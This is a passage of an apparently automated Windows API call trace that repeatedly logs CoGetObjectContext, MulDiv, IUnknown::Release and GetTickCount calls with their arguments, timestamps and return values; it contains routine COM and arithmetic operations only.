[2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.474] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.474] MulDiv (nNumber=1758, nNumerator=100, nDenominator=8120) returned 22 [0014.474] IUnknown:Release (This=0x371480) returned 0x1 [0014.474] GetTickCount () returned 0x137e1 [0014.474] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.476] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.476] MulDiv (nNumber=1758, nNumerator=100, nDenominator=8487) returned 21 [0014.476] IUnknown:Release (This=0x371480) returned 0x1 [0014.476] GetTickCount () returned 0x137e1 [0014.477] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.478] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.479] MulDiv (nNumber=1758, nNumerator=100, nDenominator=8854) returned 20 [0014.479] IUnknown:Release (This=0x371480) returned 0x1 [0014.479] GetTickCount () returned 0x137e1 [0014.479] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.480] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.481] MulDiv (nNumber=1758, nNumerator=100, nDenominator=9221) returned 19 [0014.481] IUnknown:Release (This=0x371480) returned 0x1 [0014.481] GetTickCount () returned 0x137e1 [0014.481] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.483] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.484] MulDiv (nNumber=1758, nNumerator=100, nDenominator=9588) returned 18 [0014.484] IUnknown:Release (This=0x371480) returned 0x1 [0014.484] GetTickCount () returned 0x137e1 [0014.484] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.486] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.486] MulDiv (nNumber=1758, nNumerator=100, nDenominator=9955) returned 18 [0014.486] IUnknown:Release (This=0x371480) returned 0x1 [0014.486] GetTickCount () returned 0x137e1 [0014.487] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.489] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.489] MulDiv (nNumber=1758, nNumerator=100, nDenominator=10322) returned 17 [0014.489] IUnknown:Release (This=0x371480) returned 0x1 [0014.489] GetTickCount () returned 0x137f0 [0014.490] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.491] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.492] MulDiv (nNumber=1758, nNumerator=100, nDenominator=10689) returned 16 [0014.492] IUnknown:Release (This=0x371480) returned 0x1 [0014.492] GetTickCount () returned 0x137f0 [0014.492] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.494] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.494] MulDiv (nNumber=1758, nNumerator=100, nDenominator=11056) returned 16 [0014.494] IUnknown:Release (This=0x371480) returned 0x1 [0014.494] GetTickCount () returned 0x137f0 [0014.495] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.496] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.497] MulDiv (nNumber=1758, nNumerator=100, nDenominator=11423) returned 15 [0014.497] IUnknown:Release (This=0x371480) returned 0x1 [0014.497] GetTickCount () returned 0x137f0 [0014.497] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.503] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.504] MulDiv (nNumber=3516, nNumerator=100, nDenominator=13841) returned 25 [0014.504] IUnknown:Release (This=0x371480) returned 0x1 [0014.504] GetTickCount () returned 0x137f0 [0014.504] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.508] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.509] MulDiv (nNumber=3516, nNumerator=100, nDenominator=14501) returned 24 [0014.509] IUnknown:Release (This=0x371480) returned 0x1 [0014.509] GetTickCount () returned 0x13800 [0014.509] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.514] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.515] MulDiv (nNumber=3516, nNumerator=100, nDenominator=15161) returned 23 [0014.515] IUnknown:Release (This=0x371480) returned 0x1 [0014.515] GetTickCount () returned 0x13800 [0014.515] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.519] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.520] MulDiv (nNumber=3516, nNumerator=100, nDenominator=15821) returned 22 [0014.520] IUnknown:Release (This=0x371480) returned 0x1 [0014.520] GetTickCount () returned 0x13810 [0014.520] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.523] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.524] MulDiv (nNumber=3516, nNumerator=100, nDenominator=16481) returned 21 [0014.524] IUnknown:Release (This=0x371480) returned 0x1 [0014.524] GetTickCount () returned 0x13810 [0014.524] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.528] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.529] MulDiv (nNumber=3516, nNumerator=100, nDenominator=17141) returned 21 [0014.529] IUnknown:Release (This=0x371480) returned 0x1 [0014.529] GetTickCount () returned 0x13810 [0014.529] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.533] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.535] MulDiv (nNumber=3516, nNumerator=100, nDenominator=17801) returned 20 [0014.535] IUnknown:Release (This=0x371480) returned 0x1 [0014.535] GetTickCount () returned 0x13810 [0014.535] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.540] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.541] MulDiv (nNumber=3516, nNumerator=100, nDenominator=18461) returned 19 [0014.541] IUnknown:Release (This=0x371480) returned 0x1 [0014.541] GetTickCount () returned 0x1381f [0014.542] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.545] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.547] MulDiv (nNumber=3516, nNumerator=100, nDenominator=19121) returned 18 [0014.547] IUnknown:Release (This=0x371480) returned 0x1 [0014.547] GetTickCount () returned 0x1381f [0014.547] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.551] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.552] MulDiv (nNumber=3516, nNumerator=100, nDenominator=19781) returned 18 [0014.552] IUnknown:Release (This=0x371480) returned 0x1 [0014.552] GetTickCount () returned 0x1382f [0014.553] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.556] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.557] MulDiv (nNumber=3516, nNumerator=100, nDenominator=20441) returned 17 [0014.557] IUnknown:Release (This=0x371480) returned 0x1 [0014.557] GetTickCount () returned 0x1382f [0014.558] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.561] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.561] MulDiv (nNumber=3516, nNumerator=100, nDenominator=21101) returned 17 [0014.562] IUnknown:Release (This=0x371480) returned 0x1 [0014.562] GetTickCount () returned 0x1382f [0014.562] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.565] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.566] MulDiv (nNumber=3516, nNumerator=100, nDenominator=21761) returned 16 [0014.566] IUnknown:Release (This=0x371480) returned 0x1 [0014.566] GetTickCount () returned 0x1382f [0014.566] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.569] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.571] MulDiv (nNumber=3516, nNumerator=100, nDenominator=22421) returned 16 [0014.571] IUnknown:Release (This=0x371480) returned 0x1 [0014.571] GetTickCount () returned 0x1383e [0014.571] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.575] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.576] MulDiv (nNumber=3516, nNumerator=100, nDenominator=23081) returned 15 [0014.576] IUnknown:Release (This=0x371480) returned 0x1 [0014.576] GetTickCount () returned 0x1383e [0014.577] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.588] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.590] MulDiv (nNumber=7026, nNumerator=100, nDenominator=27836) returned 25 [0014.590] IUnknown:Release (This=0x371480) returned 0x1 [0014.590] GetTickCount () returned 0x1384e [0014.590] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.596] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.597] MulDiv (nNumber=7026, nNumerator=100, nDenominator=29081) returned 24 [0014.597] IUnknown:Release (This=0x371480) returned 0x1 [0014.597] GetTickCount () returned 0x1384e [0014.598] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.603] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.605] MulDiv (nNumber=7026, nNumerator=100, nDenominator=30326) returned 23 [0014.605] IUnknown:Release (This=0x371480) returned 0x1 [0014.605] GetTickCount () returned 0x1385e [0014.605] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.612] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.613] MulDiv (nNumber=7026, nNumerator=100, nDenominator=31571) returned 22 [0014.613] IUnknown:Release (This=0x371480) returned 0x1 [0014.613] GetTickCount () returned 0x1386d [0014.614] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.619] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.621] MulDiv (nNumber=7026, nNumerator=100, nDenominator=32816) returned 21 [0014.621] IUnknown:Release (This=0x371480) returned 0x1 [0014.621] GetTickCount () returned 0x1386d [0014.621] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.627] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.628] MulDiv (nNumber=7026, nNumerator=100, nDenominator=34061) returned 21 [0014.628] IUnknown:Release (This=0x371480) returned 0x1 [0014.628] GetTickCount () returned 0x1386d [0014.629] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.635] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.636] MulDiv (nNumber=7026, nNumerator=100, nDenominator=35306) returned 20 [0014.636] IUnknown:Release (This=0x371480) returned 0x1 [0014.636] GetTickCount () returned 0x1387d [0014.637] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.643] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.645] MulDiv (nNumber=7026, nNumerator=100, nDenominator=36551) returned 19 [0014.645] IUnknown:Release (This=0x371480) returned 0x1 [0014.645] GetTickCount () returned 0x1388c [0014.645] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.654] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.654] MulDiv (nNumber=7026, nNumerator=100, nDenominator=37796) returned 19 [0014.654] IUnknown:Release (This=0x371480) returned 0x1 [0014.654] GetTickCount () returned 0x1388c [0014.655] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.659] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.659] MulDiv (nNumber=7026, nNumerator=100, nDenominator=39041) returned 18 [0014.659] IUnknown:Release (This=0x371480) returned 0x1 [0014.659] GetTickCount () returned 0x1388c [0014.660] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.664] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.665] MulDiv (nNumber=7026, nNumerator=100, nDenominator=40286) returned 17 [0014.665] IUnknown:Release (This=0x371480) returned 0x1 [0014.665] GetTickCount () returned 0x1389c [0014.665] CoGetObjectContext 